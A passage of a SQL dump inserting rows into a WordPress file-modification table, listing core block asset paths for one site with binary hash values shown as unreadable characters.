('sL–YÅÎC›‘aò—', 'wp-includes/blocks/embed/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/embed/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'nQ‘Xÿ€ho¹W„¡;E', '	cÿÃ\rŒ¿“YÓDµZáŽ‚\\išj¡¦u²+kU%', '', 0, '?'),
('rø—h^ŽÉŒg«=ÂÈû', 'wp-includes/blocks/embed/theme-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/embed/theme-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#z=5é;Õ{''n»ÍG°ý', '°tÑc„ºý‡jp­¬¸­Æ$´´—œÆôÖ1QãQ', '', 0, '?'),
('àO±*‘Òžá 9;²¡­ˆç', 'wp-includes/blocks/embed/theme-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/embed/theme-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1IãFe\0MÞÙKÀRr;¿', 'Ö×‰ô•s—hMÝw„·Àô¸8ûžÀž_.LIM', '', 0, '?'),
('ãx\\5nžW\n¬ŠÒÝÇ', 'wp-includes/blocks/embed/theme.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/embed/theme.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#z=5é;Õ{''n»ÍG°ý', '°tÑc„ºý‡jp­¬¸­Æ$´´—œÆôÖ1QãQ', '', 0, '?'),
('<Þ¤›lçöùK`¯²i´ì', 'wp-includes/blocks/embed/theme.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/embed/theme.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1IãFe\0MÞÙKÀRr;¿', 'Ö×‰ô•s—hMÝw„·Àô¸8ûžÀž_.LIM', '', 0, '?'),
('Î`hÑNkO¡N8ž‚', 'wp-includes/blocks/file/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/file/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ùQ±Š\n‹G&nOí R¸', 'Ó²»ð¿s‚²«±ã 5¶ôˆ5ØˆîI¾·¦‡·x', '', 0, '?'),
('ç¹kNí·>tñä,õÑìý¥', 'wp-includes/blocks/file/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/file/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§ƒi˜Å=N\\iŠ“(', 'š¸‚«’•ñ ©ët…ð·ôå°‘æV¤ƒïÚð\r³', '', 0, '?'),
('ÚVŠÎÛCÐÀ“ôdvÛ¦±', 'wp-includes/blocks/file/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/file/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÅL÷ê‡?í*Œž', '¢Ts3æ–›©n\nAtúlÛ©_†SŠ^ïÛHìZã#8', '', 0, '?'),
('’þÖ¬+I•7ÆŽ¬^ü¥', 'wp-includes/blocks/file/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/file/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ƒë|›Ä\ZÎùÀ#þ8ÑŠô', '·d’‹3u¬úQê˜uÀH¾B	—i!v—ŽÏe¨ÛâŒ©(', '', 0, '?'),
('[ÊBX\n¤ÂQ¿Å±“cÔ', 'wp-includes/blocks/file/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/file/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'µ6HZÄCç«w+ÎÒ{jR', '*m…Žžð‚~2}ñûvDÉ3*öä}¨.É‰¥%·3Ð®þQ', '', 0, '?'),
('úk0îkâŸ†ñãVÄXƒ†', 'wp-includes/blocks/file/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/file/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\ryŠ–[Ì#ŒzÍ¢Ì\n=â', '§GŠL~™A‚ua:çaúïUaõäÿ,/Ëw«£È)‡', '', 0, '?'),
('}ïaX–]¼ã…¨D*I', 'wp-includes/blocks/file/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/file/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Êü…\n8£¾.g\0BƒP·', 'äT<ºì©xOÕ¿WíYzÎÈ?!óÕ%¤ímÿp3‚|@¼', '', 0, '?'),
('ÿØ4Û5±µq-«Êp,÷¿', 'wp-includes/blocks/file/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/file/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '''³Éúâ=§¡\02ý¤Ûî', 'gÔ˜^VÏ{˜–!•ó–`áhBôÈaÔ¹N·´"i', '', 0, '?'),
('!¢¼>’NN¸÷‘þÙŒó', 'wp-includes/blocks/file/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/file/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'LÅ÷Nâ"ˆ’biq×“ßF¾', 'Èwbž­—¶p·mE_úN|>PédÏ[!Ñ`(¯÷Ãè›aÆ', '', 0, '?'),
('ÕÃöøÈ¨’áŒrÑé%MÃ¨', 'wp-includes/blocks/file/view.asset.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/file/view.asset.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '!CãŒxf]\\_0›ìOi“', 'oØ''Ñ|FËó‰7¤¯] +åRâ+x·4=yðYvz0R7', '', 0, '?'),
('Äcá˜£¼rä¿Íw¹ã¨', 'wp-includes/blocks/file/view.js', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/file/view.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÏvìÏ K''[#H©QŒ6™', '~vŸ·caŽ•LóbèŽ!pXz±:œIÕ$GJÀ-', '', 0, '?'),
('\rÍ›Ü¹ø}CßLÅÉR)', 'wp-includes/blocks/file/view.min.asset.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/file/view.min.asset.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÉuŽ0{o‹sÀ^.j+', '¼çl)æ g÷L¢AòÓõê.§m¥H”,\Z8zrÄÒX', '', 0, '?'),
('ªÏÕ\0ë€„	;t‘/¥‘-', 'wp-includes/blocks/file/view.min.js', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/file/view.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶Wß4øj‘ñüÙZ6', 'rj—†ä4eV“)@‡”ŽN\n”¬ºÍÑÚë˜FÒÅŸ5\n', '', 0, '?'),
('è‘÷sÙXÒ3¶ºýfÊý$', 'wp-includes/blocks/file.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/file.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '=ði<ÔÜ»''ï/Èu-9', 'b¼‰º¨XZäTÐk½|Ÿn2ÕI{ý˜eYù×G', '', 0, '?'),
('ÑÚ¬xV&ˆTZxjw•‚', 'wp-includes/blocks/footnotes/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/footnotes/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Š«.çî÷QŒ¬¼fænó3', 'lßi+!ë)f%%Ðu¥!ÎY„e¸ÇÔæ4''¤–™¾', '', 0, '?'),
('™xðý++˜¿\rºÂ‘ÿP©', 'wp-includes/blocks/footnotes/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/footnotes/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'âf«Ú`üå)²_', 'Dé‚´]£•ÐÓ=Ôå‘”ž¹2Uƒh{HE8¬A_', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('•PIU—þxÂf¯Jö%ãq¼', 'wp-includes/blocks/footnotes/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/footnotes/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÚŒâú\Z„—ZS®¨I§-', 'Pé…ÉIä·NÎ™‚“­ZÐÑtr''£Œå×‚=,]¿-·', '', 0, '?'),
('ãYÐšäqK.3h¾§Ò¦ãí', 'wp-includes/blocks/footnotes/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/footnotes/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#± üq7À@v£Ÿ³Þ‘', 'îÔi÷	þÉÀ`"¸TB]ñîæ-ÕÓY™w×êf]‹,qÕ', '', 0, '?'),
('³\rõÕŸÝ)“Œz…¢', 'wp-includes/blocks/footnotes/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/footnotes/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '0b´k.3 Ô»¯ÔÈÛ´', 'Sèø(²:`«–+ì à‘ª%Ç´ªŸ¥ÞXfE±', '', 0, '?'),
('Ú×rëÊwÆžô¿•ÖÏ', 'wp-includes/blocks/footnotes.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/footnotes.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '•J¯t©+`ì´’:Ã', 'ù2ä*àqÃ-åÚhtQ¾íe³{uÀÄEZÜ''i', '', 0, '?'),
('ºÚ+Mâ%üµ]›sD00Å', 'wp-includes/blocks/freeform/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/freeform/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '!œ”dN¬çikÛl‘œ˜B', 'ðm¢zhñ+Â Ã½çåLÆœ‚l Ühà/‹Ä„\\=', '', 0, '?'),
('g”K³„™ÒN>JªÀ4', 'wp-includes/blocks/freeform/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/freeform/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'fØöZHˆÓ”C”W>', 'Qétíæu>Y-D¬Ó¿¢]h…mohµ–Ù#“', '', 0, '?'),
('+ÈbçÊ³ëI=qYßÚ', 'wp-includes/blocks/freeform/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/freeform/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '…DàJ¿Xt9f…êë@Æ', 'Ð³v$<P!–ÝŸªjH\nâ^\0v\r¿9q¸(÷éõ', '', 0, '?'),
('æ¼g¬ìwßühm÷—ÕAú', 'wp-includes/blocks/freeform/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/freeform/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ó ´YáúSª©¡Œ(', 'üAxÏÜ<…]‹7''\rÊ\Z/ozß¹·ïz×è9‘', '', 0, '?'),
('‰ñV‰Z¾8þ=ÉvàÄâc', 'wp-includes/blocks/freeform/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/freeform/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\0Ð¯\0"\Zv¥O>®b', 'tÃêCœÃI©Î»é¯¼[ˆ•¦''¿G¿}ñt­ä×\ný#', '', 0, '?'),
('ÅöZTDÀ\r[øåFcLLÓ', 'wp-includes/blocks/gallery/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/gallery/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Fg¾Ïð9»B½	]”i$', '7çòÃU[ÉsBÄ|A´ÿQ\r@‰ðó…ïrû•©¬páVüA', '', 0, '?'),
('7¸°˜ùÈ½@”r5®î', 'wp-includes/blocks/gallery/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/gallery/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '*uþ»}‘½nl®3ân`', 'ß¡Ö•úè6¬Ã_»»¶ˆî?''	„ñ¥üóOgÃ-]gÕ', '', 0, '?'),
('­t’YSQ/[Š®RÍC', 'wp-includes/blocks/gallery/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/gallery/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'QÉv1×ŒQ&DëŒmó6¸', 'ÐuW\Z’¥ßûàÿúœ`ïpšø¨ò­I¾sXö', '', 0, '?'),
('íØÀU…ØEàýKÚ‚*ñU', 'wp-includes/blocks/gallery/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/gallery/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '•ýªþ›¤áïOÀl™‰*', '¥àÔàzqðŠZ6×Y¥’v²ãø¹cdúÁ]', '', 0, '?'),
('|ƒêæ½LçïF8ƒ5<ZM', 'wp-includes/blocks/gallery/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/gallery/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ü­G"šÿ^äóFºÞØ 7', 'ó•“l4¬ÉzE.,)¸*ƒyièóÐå¨|è;…â>', '', 0, '?'),
('ÚãÌ­\n5ïB…óî£ß+Õl', 'wp-includes/blocks/gallery/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/gallery/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'xuÜËcî£µL‹\Zß{Bx', 'Zh‹Z,Àè!Ìœ3®ï¿¤ºu51Ô™ûç†ÕøÙ_', '', 0, '?'),
('þ}€æA©î5í PÔ†Îô', 'wp-includes/blocks/gallery/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/gallery/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'é¿Þv«|šJKe''ßŒ', '*‹#\Za×õiYJiµFL­‡Ä/î¯M¶KÛ7ÜóÜ2Ê', '', 0, '?'),
('·˜\\¨éÎ0O¶''w[l/^$', 'wp-includes/blocks/gallery/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/gallery/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'CŒ¶Ôá\\Æf`ˆ•éh', 'ÜÊ	\\ÂCDè^ˆaˆqëLÌ·›ZJÿ¥š÷uÌo;X', '', 0, '?'),
('ë_‹1t=qTµQ¤*«Fò', 'wp-includes/blocks/gallery/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/gallery/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'iî\ZáÁ0Ë›•DVu4.', '\0ì+û€÷¸ú´T‚“]zOä	ØsçÐ¢ |Æ)ìÜ', '', 0, '?'),
('_w¹ú°æÀØö''×JS6', 'wp-includes/blocks/gallery/theme-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/gallery/theme-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ýÞ‹ù¼lŒ>nýqËyW¬', '„“É¹aß¿ØëëKÛ˜néý¦Í“ÿ+õn²bò¾', '', 0, '?'),
('û¨0wc`Ø£78ÔŸM', 'wp-includes/blocks/gallery/theme-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/gallery/theme-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '3J™DÔô„FÄ­ú~2õ?', 'kREŒLMšâèXäÊ]l ”¦f,‰¨Ç*hÐOýI{Ùí', '', 0, '?'),
('DmŽ¹è‹þo„"¤ìÕaÛ', 'wp-includes/blocks/gallery/theme.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/gallery/theme.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ýÞ‹ù¼lŒ>nýqËyW¬', '„“É¹aß¿ØëëKÛ˜néý¦Í“ÿ+õn²bò¾', '', 0, '?'),
('\\LÞ}Ò÷æY–~ÜlaŠ£', 'wp-includes/blocks/gallery/theme.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/gallery/theme.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '3J™DÔô„FÄ­ú~2õ?', 'kREŒLMšâèXäÊ]l ”¦f,‰¨Ç*hÐOýI{Ùí', '', 0, '?'),
('­Áo+F‹¿ü0Hn3ÇhJ', 'wp-includes/blocks/gallery.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/gallery.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'VÏº§…#ªî “¿k2ªÍ', '#F 7S˜„»\Z7Ãd9ÙÑd}Äü;ç‚b’!´ÝH', '', 0, '?'),
('²1AëâbÈ±‰â8£”EN', 'wp-includes/blocks/group/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/group/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ';£ÉuHùÒ@"„¶c”', '¨\Z¢¨ËˆZâŸç(UM~«‡³ÿÏ‘hY¼²S]C', '', 0, '?'),
('Ä›Åwú²+ë¶qAZ', 'wp-includes/blocks/group/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/group/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Bl‹ž?÷ÌêG„o$g\Z)', 'mãúîSÖé‡‚qû˜jû a]X\nSÇùÓ¿åw£ØÉ', '', 0, '?'),
('j;¡Ç_§=Ø\Zü“˜', 'wp-includes/blocks/group/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/group/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '~Qé‡*‹…‡&D\\Ó', '¶åqmVPåk¤P¡¶\r¦F,~3õó«,‹©·êÂðF-', '', 0, '?'),
('eÍ''±ð÷7„\r€‚íÚÏØ', 'wp-includes/blocks/group/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/group/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Bl‹ž?÷ÌêG„o$g\Z)', 'mãúîSÖé‡‚qû˜jû a]X\nSÇùÓ¿åw£ØÉ', '', 0, '?'),
(',õ’(X''¬ƒ‹á%Z‹Æ|', 'wp-includes/blocks/group/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/group/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '~Qé‡*‹…‡&D\\Ó', '¶åqmVPåk¤P¡¶\r¦F,~3õó«,‹©·êÂðF-', '', 0, '?'),
('œ)ÍPeÕîDî£øˆÈ s', 'wp-includes/blocks/group/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/group/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '4L¦Žš`Â*ëA7\Zg', 'ÅIåñÒûŒlA2‚]àOÂI_¼0Ý£Õi§¾', '', 0, '?'),
('–sÌ6Zø$Ó¾yáD(', 'wp-includes/blocks/group/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/group/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '=>½åÄ* ¡f´±[µ³ž', 'Ï©‘—þz—„J&–O{|K^–Ö¤«0.Õ1t', '', 0, '?'),
('yñ «\0LzÀã¶µÙˆ', 'wp-includes/blocks/group/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/group/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '4L¦Žš`Â*ëA7\Zg', 'ÅIåñÒûŒlA2‚]àOÂI_¼0Ý£Õi§¾', '', 0, '?'),
('ºx;_úqíˆ*`<', 'wp-includes/blocks/group/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/group/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '=>½åÄ* ¡f´±[µ³ž', 'Ï©‘—þz—„J&–O{|K^–Ö¤«0.Õ1t', '', 0, '?'),
('ÏŠYwÔ×¹˜ŒE­Gê', 'wp-includes/blocks/group/theme-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/group/theme-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '3ƒjC€OÑº}’`xÝ°¦', '€ûGCñf0S®"hsÉçp4YuR\Zö­$àÅxqO', '', 0, '?'),
('§Ìcá-,RŽqee\\Þ', 'wp-includes/blocks/group/theme-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/group/theme-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\\	¥Ê½=‘fZ9U', 'â\ri $y+á‹hô?±øƒÆjé­¾\Z‰˜ºb3­sJ)', '', 0, '?'),
('¦"­QƒOO±ÀP¤ã b', 'wp-includes/blocks/group/theme.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/group/theme.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '3ƒjC€OÑº}’`xÝ°¦', '€ûGCñf0S®"hsÉçp4YuR\Zö­$àÅxqO', '', 0, '?'),
('°sü$ŸÐlAóF-Á¹^€Û', 'wp-includes/blocks/group/theme.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/group/theme.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\\	¥Ê½=‘fZ9U', 'â\ri $y+á‹hô?±øƒÆjé­¾\Z‰˜ºb3­sJ)', '', 0, '?'),
('	æ¶÷IhðBšpO', 'wp-includes/blocks/heading/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/heading/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÿ©íÅã ÂRßR«5', 'üb¤+á`íÊÃŽ¶wwx¿\r@&je¢ú"÷ÄN', '', 0, '?'),
('ú÷gŠ(¯35ÑÒ5ík†(', 'wp-includes/blocks/heading/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/heading/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'g×Íjõ=ÈbIõöÖg', 'BºQý6bbD«JútÐ^yYšðy·û²†	', '', 0, '?'),
('ûztð[ Óþ¢À ›Ž“', 'wp-includes/blocks/heading/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/heading/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '!¶<fK/’ó™ló7', 'H™›3Yù„š¨F@‰ù&''s ­Û+ƒœkÇ}/Ÿ‡', '', 0, '?'),
('¾@)` Õä~OÝ}ï»acÌ', 'wp-includes/blocks/heading/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/heading/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'g×Íjõ=ÈbIõöÖg', 'BºQý6bbD«JútÐ^yYšðy·û²†	', '', 0, '?'),
('†ñ‚kVþÞ7­“£2Ò+', 'wp-includes/blocks/heading/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/heading/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '!¶<fK/’ó™ló7', 'H™›3Yù„š¨F@‰ù&''s ­Û+ƒœkÇ}/Ÿ‡', '', 0, '?'),
('§¼eŠÂ2—¦Ì#Èë©^G', 'wp-includes/blocks/heading.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/heading.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'hu\Z’t\ZKÁ°#ó¹>\0{', 'å<Å8)JYøÙçÜ$¾VÚ2%r˜©…I&¥éäË{=Ù', '', 0, '?'),
('m½5­)''òßaH³\r¤ë-', 'wp-includes/blocks/home-link/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/home-link/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '*Œ(ÑÆ`Ñ=Ë~‹', 'f¥ígm3ëœŒÁËÀ´·BºDÓÕ~q@ýË5‡õüï‡', '', 0, '?'),
('1›\r{Ñ†”nDeâÞP]í', 'wp-includes/blocks/home-link.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/home-link.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'áwÁcE·á†îjSÔÄ', 'B•É>Ëít5€ã·â‹þËZZ•X Ã“\r=•_', '', 0, '?'),
('Šž¾/ªÄ\Z²ø)yÐ\r', 'wp-includes/blocks/html/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/html/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ô’îÂ,Íe[Ô2¦^.½†‹', 'x§LÙmR—á»~— eç«šûÅŸzAÚE×Ñyz0ôµ', '', 0, '?'),
('Á@óƒ„÷Šœëµ°On£', 'wp-includes/blocks/html/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/html/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'CÉ2‡èå\rÅnØw×L5', '§†é½ÄŠkm<@¹axf:Lc¾ëoÜÚr¾`eô', '', 0, '?'),
('ÄvûV/WÎÏ{}!^ÏN', 'wp-includes/blocks/html/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/html/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'd©„Ü''>t>¦	\noÔgß', '„§Æ©¬\nyoÎhSL-³¯(¦>~…a\ny{,­p ª', '', 0, '?'),
('7Üc-¾”ÕkÐ„"¶`k', 'wp-includes/blocks/html/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/html/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ÿ[ø0UtGÅ¸/6\\±[ò', '€ž×@¹òNÅz&Œ¬Údú† L¢h–½]X(e‚h', '', 0, '?'),
('gvÔÙ\ZUOÿÝòñð­öÉ', 'wp-includes/blocks/html/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/html/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ';D4Ç[¾É7z•,3çÿ', '\\œs|o»Ã­ë_6ŒM0imž’“rãQj$Ô‘', '', 0, '?'),
('ä\ZôKéõ^ª½û\nõ', 'wp-includes/blocks/image/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/image/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÈZÄERœM\ZÑa 0·', 'HsTIQÂ36½PÖ-âãvÔìøSŒª£…ÑaøtsF', '', 0, '?'),
(')FTj›—­ó«CJcûG', 'wp-includes/blocks/image/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/image/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'àÒD!t†6¨”‚§¬¾Þž', '¬—Ym*Ë	1zy¶†K¾N¯hò5ÃÎkÑùX\0^`', '', 0, '?'),
('ä\\/è„WÞnÎ-•\n 9', 'wp-includes/blocks/image/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/image/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '³ô" 4ìÙ#ÊLoP~ßš€', 'é­Š)wµY¦kè®Æ´ØÙÒâ.³,e­àe\r''7…ûÙ', '', 0, '?'),
('ctÅ×©’XîÙ¾ÞuÛyv', 'wp-includes/blocks/image/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/image/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ü¯ð„ËïgÉ/P0„ÛÃ', '½[»È+^·«Ì¶Ý\0§QPÚñî''´øíy±î‡H5', '', 0, '?'),
('9wv\r÷î‘Û^›«!C©', 'wp-includes/blocks/image/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/image/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'É›i«çÙiRW¤¼C±\n', 'Ê@¼»µ¯Höb?_ò(…Ú-t«{O>\0ÕR@îS', '', 0, '?'),
('F`Mß¸cÿN§!¡·¯í', 'wp-includes/blocks/image/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/image/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '•»³UË=Ùn-m_½š', 'MeR‹ålñ‰D’áà=*{|:‘ošÖOU¯œI', '', 0, '?'),
